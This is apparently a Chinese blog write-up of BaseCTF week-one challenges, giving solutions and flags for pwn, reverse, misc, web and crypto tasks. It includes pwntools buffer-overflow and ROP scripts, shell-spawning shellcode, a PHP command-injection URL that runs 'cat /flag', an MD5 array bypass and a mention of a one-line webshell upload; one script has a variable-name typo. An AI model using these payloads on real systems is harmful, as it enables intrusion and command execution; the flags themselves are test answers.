week1
pwn
签个到吧
cat flag
echo
echo "$(<flag)"
Ret2text
from pwn import *
p = remote('challenge.basectf.fun',23807)
gift_addr = 0x4011A4
payload = b'a' * 0x20 + p64(0) + gitf_addr
p.sendline(payload)
p.interactive()
shellcode_level0
from pwn import *
context(log_level='debug', arch='amd64', os='linux')
p = remote('challenge.basectf.fun', 49980)
shellcode = asm(shellcraft.sh())
payload = shellcode
p.sendlineafter('please input shellcode:', payload)
p.interactive()
我把她弄丢了
from pwn import *
p = remote('challenge.basectf.fun', 20176)
pop_rdi = 0x401196
bin_sh_addr = 0x402008
shell = 0x4011FD
system = 0x401080
payload = b'a' * 120 + p64(0x40101a) + p64(pop_rdi) + p64(bin_sh_addr) + p64(system)
# p64(0x40101a)仅用于平衡pop|ret中的ret,值无实际意义
p.sendlineafter('I lost her, what should I do? Help me find her.\n', payload)
p.interactive()
reverse
You are good at IDA
BaseCTF{Y0u_4Re_900d_47_id4}
UPX mini
UPX+base64
BaseCTF{Hav3_@_g0od_t1m3!!!}
ez_maze
迷宫图,wsad(上下左右)
x$$$$$$$$$$$$$$ &&&&&&$$$$$$$$$ &$&$$&$$&&&&&$$ &$&$$$&&$$$$&$$ &$$$&&&$$$$$&$$ &$$$&$&&$&$$$$$ &$$$&$&$$&&&$$$ &&&&&$&&&&$&$$$ $$$$$$&&&&&&$$$ $$$$$$&$$$$$$$$ $$$&&&&$$&&&$$$ $$$&&&&&&&$$$$$ $$$$$$$$$&$$&$$ $$$$$$$$$&$&$$$ $$$$$$&&&&&&&&y
PATH:sssssssddddwwwddsssssssdddsssddddd
MD5加密后得flag
BaseCTF{131b7d6e60e8a34cb01801ae8de07efe}
BasePlus
Misc
Base
一次base32,一次base64
BaseCTF{we1c0me_to_b4sectf}
人生苦短,我用Python
if len(flag) != 38: # flag长度为38
if not flag.startswith('BaseCTF{'): # part1:BaseCTF{
if flag.find('Mp') != 10: # flag[10] = 'M', flag[11] = 'p'
if flag[-3:] * 8 != '3x}3x}3x}3x}3x}3x}3x}3x}': # endpart:3x}
if ord(flag[-1]) != 125: # 最后一个符号为}
if flag.count('_') // 2 != 2: # 字符中的_有4~5个
if list(map(len, flag.split('_'))) != [14, 2, 6, 4, 8]: # 四个'_',每个'_'分隔的字符串长度分别为14、2、6、4、8
if flag[12:32:4] != 'lsT_n': # 12~32每隔4个取一个字符
if '😺'.join([c.upper() for c in flag[:9]]) != 'B😺A😺S😺E😺C😺T😺F😺{😺S': # 前9个字符大写为BASECTF{S
if not flag[-11].isnumeric() or int(flag[-11]) ** 5 != 1024: # flag[-11] = 4
if base64.b64encode(flag[-7:-3].encode()) != b'MG1QbA==': # flag[-7:-3] = 0mPl
if flag[::-7].encode().hex() != '7d4372733173': # 从后往前7个一步}Crs1s
if set(flag[12::11]) != {'l', 'r'}: # 从索引 12 开始,每隔 11 个字符取一个字符。
if flag[21:27].encode() != bytes([116, 51, 114, 95, 84, 104]): # 't3r_Th'
if sum(ord(c) * 2024_08_15 ** idx for idx, c in enumerate(flag[17:20])) != 41378751114180610: # _Be
if not all([flag[0].isalpha(), flag[8].islower(), flag[13].isdigit()]): # flag[0]为字母,flag[8]为小写字母,flag[13]为数字
if '{whats} {up}'.format(whats=flag[13], up=flag[15]).replace('3', 'bro') != 'bro 1': # flag[13] = 3, flag[15] = 1
if hashlib.sha1(flag.encode()).hexdigest() != 'e40075055f34f88993f47efb3429bd0e44a7f479': # 这里用来验证flag是否发生变化
flag
BaseCTF{s1Mpl3_1s_BeTt3r_Th4n_C0mPl3x}
海上遇到了鲨鱼
BaseCTF{15ef386b-a3a7-7344-3b05-ac367316fb76}
web
HTTP 是什么呀
按要求配置对应参数
Cookie:c00k13=i can't eat it X-Forwarded-For:127.0.0.1 Referer: Base User-Agent: Base Base=fl%40g ?basectf=we1c%2500me
响应头
success.php?flag=QmFzZUNURntkNGEyN2IzNC1iZmI4LTRlMWUtODcyNS0zMmUzNmZjYjc5M2N9Cg==
base64解码得flag
BaseCTF{d4a27b34-bfb8-4e1e-8725-32e36fcb793c}
喵喵喵´•ﻌ•`
http://challenge.basectf.fun:46834/?DT=system(%22cat%20/flag%22);
flag
BaseCTF{96a475ea-0da0-411c-ac25-75cde184e531}
md5绕过欸
php无法处理数组,利用数组返回null即可实现绕过
http://challenge.basectf.fun:31796?name[]=1&name2[]=1 password[]=2&password2[]=2
flag
BaseCTF{e6c407ce-77bc-4ad0-a629-15ed57b69947}
upload
上传一个一句话木马即可
BaseCTF{c4a1d237-40d0-4455-94c1-ef4f47868772}
A Dark Room
查看源代码
BaseCTF{365c5909-712e-4f35-816c-52616ad6e700}
Crypto
helloCrypto
exp
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
from Crypto.Util.number import long_to_bytes
# 假设我们已经知道了密钥的长整型表示
long_key = 208797759953288399620324890930572736628 # 这里填写实际的长整型密钥
# 将长整型密钥转换为字节串
key = long_to_bytes(long_key)
# 将十六进制字符串的密文转换为字节串
ciphertext = b'U\xcd\xf3\xb1 r\xa1\x8e\x88\x92Sf\x8a`Sk],\xa3(i\xcd\x11\xd0D\x1edd\x16[&\x92@^\xfc\xa9(\xee\xfd\xfb\x07\x7f:\x9b\x88\xfe{\xae'
# 创建一个新的AES对象,使用相同的密钥和ECB模式进行解密
cipher = AES.new(key=key, mode=AES.MODE_ECB)
# 解密密文
plaintext_padded = cipher.decrypt(ciphertext)
# 移除PKCS#7填充
plaintext = unpad(plaintext_padded, AES.block_size)
# 输出原始的明文
print(plaintext)
flag
BaseCTF{b80bf679-1869-4fde-b3f9-d51b872d31fb}
十七倍
exp
def extended_gcd(a, b):
if a == 0:
return (b, 0, 1)
else:
g, x, y = extended_gcd(b % a, a)
return (g, y - (b // a) * x, x)
def mod_inverse(a, m):
g, x, _ = extended_gcd(a, m)
if g != 1:
raise Exception('Modular inverse does not exist')
else:
return x % m
inverse_17 = mod_inverse(17, 256)
def decrypt(c):
return (c * inverse_17) % 256
# 示例使用
ciphertext = [98, 113, 163, 181, 115, 148, 166, 43, 9, 95,
165, 146, 79, 115, 146, 233, 112, 180, 48, 79,
65, 181, 113, 146, 46, 249, 78, 183, 79, 133,
180, 113, 146, 148, 163, 79, 78, 48, 231, 77]
for i in ciphertext:
plaintext = decrypt(i)
f = chr(plaintext)
print(f, end='')
flag
BaseCTF{yoUr_CrYpt0_1earNinG_5tarTs_n0w}
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
